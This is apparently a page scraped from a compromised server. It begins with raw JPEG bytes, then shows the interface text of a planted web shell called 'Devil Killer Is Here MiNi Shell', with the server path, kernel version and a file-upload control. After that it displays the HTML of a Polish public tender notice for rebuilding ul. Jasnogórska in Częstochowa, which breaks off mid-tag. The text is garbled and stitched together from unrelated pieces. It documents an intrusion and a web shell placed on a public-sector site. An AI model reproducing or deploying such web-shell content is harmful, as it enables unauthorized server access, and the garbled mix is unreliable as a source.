JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230629/0028236301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ul. Jasnogórskiej w Częstochowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZARZĄD DRÓG w CZĘSTOCHOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 150309847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Legionów 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Częstochowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-202</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@mzd.czest.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzd.czest.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ul. Jasnogórskiej w Częstochowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c5d9f054-0f3d-11ee-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00282363</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00031741/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Przebudowa ulicy Jasnogórskiej w Częstochowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/mzd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/mzd</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korzystanie z Platformy jest bezpłatne. Podgląd i pobieranie dokumentacji postępowania nie wymaga logowania. Wykonawca celem złożenia oferty bezpłatnie rejestruje się na Platformie pod wyżej wymienionym adresem klikając przycisk „Załóż konto”. Wykonawca rejestrując się zapoznaje się i akceptuje warunki korzystania z Platformy, określone w regulaminie podczas rejestracji oraz uznaje go za wiążący. Do rejestracji niezbędne jest zainstalowanie programu Java w ver.1.8. Szczegółowe informacje dotyczące sposobu wykonania tych czynności znajdują się w „Instrukcja obsługi Portalu e-Usług SmartPZP”, dostępnej na stronie Platformy. Wykonawca posiadający konto ma dostęp do następujących formularzy: złożenia, zmiany i wycofania oferty lub wniosku oraz formularza „Pytania i odpowiedzi”. Szczegółowa instrukcja użytkownika Wykonawcy portalu SmartPzp dostępna jest na stronie portalu SmartPzp w zakładce e-learning. Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0 , Windows 7 i Mac OS 10.12 - lub ich nowsze wersje;<br/>c) Zainstalowana przeglądarka internetowa: Internet Explorer 11, Mozilla Firefox ver. 46 i późniejsze, Google Chrome ver. 45 i późniejsze lub Opera ver. 37 i późniejsze; Przeglądarki zalecane: Mozilla Firefox, Google Chrome lub Opera.<br/>d) Włączona obsługa JavaScript;<br/>e) Oprogramowanie Java ver. 1.8 lub wyższe;<br/>f) Zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów .pdf.<br/>Oferta oraz wszelkie dokumenty wymagające podpisu podpisywane są w postępowaniu: kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym. Wszelkie informacje dotyczące korespondencji elektronicznej są wskazane w SWZ w pkt 9.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) Administratorem Pani/Pana danych osobowych jest Miejski Zarząd Dróg w Częstochowie z siedzibą przy ulicy Legionów 52, 42- 202 Częstochowa (e-mail: mzd@mzd.czest.pl; nr tel.: 34 366 43 05).<br/>b) W sprawach dotyczących przetwarzania Pani/Pana danych osobowych, w tym realizacji Pani/Pana praw przez Administratora, można się kontaktować z wyznaczonym Inspektorem Ochrony Danych w następujący sposób: listownie na adres siedziby<br/>administratora: 42-202 Częstochowa, ul. Legionów 52; e-mailem: iod@mzd.czest.pl; tel.: 34 366 43 05.<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c, RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonego w trybie art. 275 pkt 1 ustawy Prawo Zamówień Publicznych – tryb podstawowy bez negocjacji pn.: Przebudowa ulicy Jasnogórskiej w Częstochowie.<br/>d) Odbiorcami Pani/Pana danych osobowych będą:<br/>- osoby lub podmioty, którym udostępniona zostanie dokumentacja przedmiotowego postępowania;<br/>- pracownicy obsługujący proces związany z postępowaniem o udzielenie zamówienia publicznego, wykonywaniem oraz rozliczeniem umowy, a także nadzorujący ten proces,<br/>- odbiorcą Pani/Pana danych mogą być również podmioty uprawnione lub zobowiązane do ich uzyskania na podstawie przepisów prawa.<br/>- podmioty, które przetwarzają Państwa dane osobowe w imieniu Administratora, na podstawie zawartej umowy powierzenia danych osobowych (tzw. Podmioty przetwarzające).<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy-Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy lub przez okres wynikający z przepisów szczególnych.<br/>f) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy-Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy-Pzp.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZD.ZP.26.1.19.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Przebudowa ulicy Jasnogórskiej w Częstochowie. Przebieg trasy oraz geometria ulicy Jasnogórskiej została dostosowana do przebiegu w stanie istniejącym.<br/><br/>Zakres zadania:<br/><br/>Część drogowa:<br/><br/>•	niezbędne prace przygotowawcze, w tym oczyszczenie pasa z zieleni,<br/>•	wycinka drzew, krzewów kolidujących z inwestycją,<br/>•	humusowanie skarp wraz z obsianiem,<br/>•	roboty rozbiórkowe (rozbiórka istniejących utwardzonych nawierzchni),<br/>•	wykonanie jezdni ul. Jasnogórskiej o nawierzchni z betonu asfaltowego klasy „L” na długości 713,00m o szerokości: 6,00m na odcinku od skrzyżowania z ulicą Popiełuszki do skrzyżowania <br/>z ulicą Dąbrowskiego, 6,50m na odcinku od skrzyżowania z ulicą Dąbrowskiego do skrzyżowania z ulicą Kilińskiego, <br/>•	obustronne ciągi piesze, <br/>•	przebudowa istniejących skrzyżowań, w tym przede wszystkim wykonanie skrzyżowań <br/>z wyniesioną tarczą (element spowolnienia ruchu). Dotyczy to skrzyżowania ulicy Jasnogórskiej <br/>z ulicą Partyzantów oraz ulicy Jasnogórskiej z ulicą Żwirki i Wigury/ Racławicką. Na pozostałych skrzyżowaniach będzie wykonane dowiązanie sytuacyjne (regulacja łuków) i wysokościowe ich wlotów, <br/>•	zjazdy indywidualne i publiczne o nawierzchni z betonowej kostki brukowej,<br/>•	nasadzenia drzew, przesadzenia krzewów, odtworzenie trawników, <br/>•	dwuletnia pielęgnacja nasadzonych drzew i krzewów oraz wykonanych trawników,<br/>•	wykonanie oznakowania, <br/>•	wytyczenie punktów granicznych zgodnie z decyzją,<br/>• opracowanie projektu docelowej organizacji ruchu, uwzględniającego ewentualne zmiany projektowe (wymagane zatwierdzenie w Urzędzie Miasta Częstochowy).<br/><br/><br/>Mała architektura:<br/> W ramach zadania przewiduje się wykonanie na odcinku objętym opracowaniem elementów małej architektury w postaci: <br/>- odtworzenia istniejących gazonów (8 szt.) zlokalizowanych na wlocie ul. Jasnogórskiej <br/>na skrzyżowaniu z ul. Popiełuszki, <br/>- betonowych koszy na śmieci w ilości 16 sztuk. <br/><br/>Część sanitarna:<br/>Przebudowa wodociągu wraz z sięgaczami w granicy pasa drogowego dla potrzeb przebudowy ulicy Jasnogórskiej oraz przebudowa i budowa odcinka wodociągu w ulicy Partyzantów z włączeniem <br/>w wodociąg w ulicy Jasnogórskiej. Projektowany wodociąg włączony zostanie do istniejących wodociągów w ulicach: ks. J. Popiełuszki, Racławickiej, Żwirki i Wigury, Partyzantów, Dąbrowskiego i Kilińskiego tworząc układ pierścieniowy.<br/><br/>Na całej długości projektowanej sieci wodociągowej w obszarze planowanej inwestycji, zaprojektowano średnicę Ø160 z wyjątkiem odcinka od ulicy Dąbrowskiego do ulicy Kilińskiego, gdzie przyjęto średnice Ø200. Zwiększenie średnicy wodociągu na odcinku od ulicy Dąbrowskiego do ulicy Kilińskiego umożliwi <br/>w pełni zabezpieczenie przeciwpożarowe Teatru im. Adama Mickiewicza. Wodociąg poprowadzono pod jezdnią w odległości około 80 cm od projektowanego krawężnika. Włączenie projektowanego wodociągu DN 160 z rur żeliwnych sferoidalnych nastąpi w węźle w1. Na włączeniu zabudowana zostanie zasuwa DN150. Zaraz za nim nastąpi przepięcie istniejącego wodociągu DN150 w ulicy ks. J. Popiełuszki (Pw1) oraz przepięcie wodociągu DN100 (Pw2). W węźle zabudowane zostaną dwie zasuwy DN150 oraz jedna DN100.<br/><br/>Kanalizacja deszczowa:<br/><br/> Kanalizacja deszczowa włączona zostanie do istniejących kolektorów deszczowych w ulicach: ks. J. Popiełuszki, Kilińskiego, Dąbrowskiego oraz al. Jana Pawła II.<br/>	Dla potrzeb odwodnienia przebudowywanej ulicy Jasnogórskiej zaprojektowano wpusty deszczowe, które zostaną włączone do projektowanej kanalizacji deszczowej. Zaprojektowano 7 odcinków kanalizacji deszczowej. Główny kolektor deszczowy o średnicy 800mm i dł. 281m poprowadzono z ul. Partyzantów. Ciąg ten poprzez istn. studnię rewizyjną zostanie włączony do istniejącego w pasie drogowym Al. Jana Pawła II kolektora deszczowego fi 2000mm. Przed wprowadzeniem wód do kolektora zaprojektowano zbiornik retencyjny o pojemności 200m3. Zbiornik zlokalizowany będzie pod powierzchnią istniejącego parkingu. Do projektowanego kolektora w ul. Partyzantów będą odprowadzone dwa odcinki kanalizacji deszczowej ul. Jasnogórskiej oraz wody deszczowe z zespołu budynków mieszkalnych wielorodzinnych zlokalizowanych u zbiegu ulic Jasnogórskiej i Partyzantów. <br/> <br/>Część elektroenergetyczna: przebudowa sieci elektroenergetycznej<br/>Część teletechniczna: <br/>- budowa kanału technologicznego wzdłuż ulicy Jasnogórskiej na skrzyżowaniu z ul. Dąbrowskiego oraz Kilińskiego;<br/> - wykonanie kanalizacji technologicznej umożliwiającej zaciąganie kabli w kanalizacji do połączenia sygnalizacji ulicznej z Miejską Siecią Monitoringu.<br/>Przebudowa ciepłociągu wysokoparametrowanego wraz ze wszystkimi przyłączami,<br/>Przebudowa ciepłociągu niskookoparametrowanego wraz ze wszystkimi przyłączami c.o. do budynków<br/><br/>Zamawiający wymaga udzielenia minimum 60 miesięcznej, a maksymalnie 96 miesięcznej gwarancji i rękojmi na przedmiot zamówienia.<br/><br/>Ponadto Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w niżej opisanych etapach i po spełnieniu poniższych warunków:<br/><br/>1. Do 08.09.2023r w przypadku zlecenia robót w ramach prawa opcji, należy przebudować ciepłociągi wraz z przyłączami (chyba że dłuższy termin zostanie pisemnie uzgodniony <br/>z gestorem sieci, mając na uwadze konieczność prowadzenia robót przed rozpoczęciem sezonu grzewczego).<br/>2. Do 01.09.2023r należy wybudować zbiornik retencyjny i odcinek kanału deszczowego DN 800 mm ok. 75,0 m (poza skrzyżowanie ul. Partyzantów z ul. Zwycięzców) z zachowaniem przejezdności ul. Partyzantów od strony ul. Jasnogórskiej. Po wykonaniu w/w prac, Wykonawca na bieżąco doprowadzi teren do warstw konstrukcyjnych.<br/>3. Do 01.09.2023r Wykonawca wykona dokumentacje techniczną, uzyska zgłoszenie robót budowlanych na wjazd z Al. Jana Pawła II w ul. Partyzantów, wykona w/w zjazd oraz <br/>po zakończeniu robót przywróci teren do stanu pierwotnego.<br/>4.	Do dnia 01.09.2023r należy wybudować tymczasowy zjazd z ul. Popiełuszki w ul. Edwarda Mąkoszy.<br/>5. Do 30.11.2023r należy wykonać wodociąg z zachowaniem przejezdności na odcinku <br/>od ul. Popiełuszki do ul. Partyzantów, oraz wybudować cały wodociąg i kanalizacje deszczową <br/>w ul. Partyzantów. W celu uzyskania możliwie jak najdłuższej przejezdności należy wykonać <br/>w pierwszej kolejności kanał deszczowy DN 800 mm – odcinek do studni D4. Następnie <br/>po zamknięciu ul. Partyzantów od strony ul. Jasnogórskiej wykonać wodociąg i w pasie drogowym w/w ulicy. <br/>6.	Przez cały zakres prac, należy utrzymać po jednej stronie ciąg pieszy, oraz zapewnić dostęp <br/>do posesji.<br/>7.	W związku z trwającą budową przy ul. Jasnogórskiej 62 należy umożliwić dojazd do w/w posesji.<br/>8.	Po 31.03.2024r. należy rozpocząć przebudowę drogi wraz z sieciami na skrzyżowaniu <br/>ul. Jasnogórskiej z ul. Dąbrowskiego i z ul. Kilińskiego.<br/>9.	Do 30.04.2024 r należy wykonać w warstwie wiążącej ul. Jasnogórską na odcinku <br/>od ul. Popiełuszki do ul. Partyzantów.<br/>10.	Wykonawca przez cały zakres prac w celu zapewnienia miejsc parkingowych dla mieszkańców oraz dojazdu służb porządkowych przy ul. Partyzantów umożliwi przejazd jednym z wjazdów znajdujących się przy bloku mieszkalnym na ul. Partyzantów 2 lub ul. Partyzantów 8/10.<br/>11.	Parking przy byłej siedzibie Miejskiego Zarządu Dróg (ul. Popiełuszki 4/6) należy wyposażyć <br/>w piloty dla mieszkańców.<br/>- należy wyznaczyć miejsca postojowe w ilości 50 sztuk,<br/>- dostęp do parkingu należy ograniczyć szlabanem zabezpieczonym pilotami w max ilości <br/>50 sztuk.<br/>12.	W celu zapewnienia miejsc parkingowych dla mieszkańców ul. Partyzantów Wykonawca zapewni na czas budowy dojazd na boisko szkolne znajdujące się przy Zespole Szkolno-Przedszkolnym nr 1, przy założeniu ilość miejsc postojowych: 170, ilość pilotów: 170 sztuk.<br/><br/>Po zakończeniu prac Wykonawca na własny koszt doprowadzi w/w teren do stanu pierwotnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45233294-6 - Instalowanie sygnalizacji drogowej</p> <p class="mb-0">32573000-0 - Komunikacyjny system sterowania</p> <p class="mb-0">45231110-9 - Roboty budowlane w zakresie kładzenia rurociągów</p> <p class="mb-0">45232140-5 - Roboty budowlane w zakresie lokalnych sieci grzewczych</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Działając na podstawie art. 441 ust. 1 ustawy Pzp Zamawiający zamierza skorzystać z prawa opcji dla części zamówienia wykraczającej poza zamówienie podstawowe i obejmującej następujące roboty budowlane:<br/>•	Przebudowa ciepłociągu wysokoparametrowanego wraz ze wszystkimi przyłączami,<br/>•	Przebudowa ciepłociągu niskookoparametrowanego wraz ze wszystkimi przyłączami c.o. do budynków.<br/><br/>Dodatkowe roboty budowlane wskazane w pkt 3.1 SWZ uzależnione będą wyłącznie od potrzeb i możliwości finansowych Zamawiającego. Dodatkowe roboty budowlane zrealizowane będą po cenach jednostkowych określonych w kosztorysie ofertowym oraz wartościach oferowanych w poz. 12-16 Zestawienia kosztorysów. O dodatkowych robotach budowlanych (w ramach prawa opcji) Zamawiający poinformuje Wykonawcę w terminie nie dłuższym niż 7 dni kalendarzowych od daty zawarcia umowy. Wykonawca nie może żądać od Zamawiającego realizacji prawa opcji. Prawo opcji będzie realizowane na podstawie zapisów zawartych w umowie podstawowej. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy-Pzp. Zamawiający przewiduje udzielenie zamówień dotychczasowemu Wykonawcy, stanowiących nie więcej niż 30% wartości zamówienia podstawowego polegającego między innymi na powtórzeniu podobnych usług lub robót budowlanych, wyszczególnionych w zestawieniu kosztorysów zamówienia podstawowego w zakresie związanym z tym zamówieniem. Wykonanie tych usług lub robót budowlanych może nastąpić w trakcie trwania umowy dla zamówienia podstawowego, a także w ciągu 3 lat po jej zakończeniu Wykonawcy, który wykonywał zamówienie podstawowe na podstawie osobnej umowy po dokonaniu negocjacji.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN UDZIELANEJ RĘKOJMI ORAZ GWARANCJI JAKOŚĆI w MIESIĄCACH</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 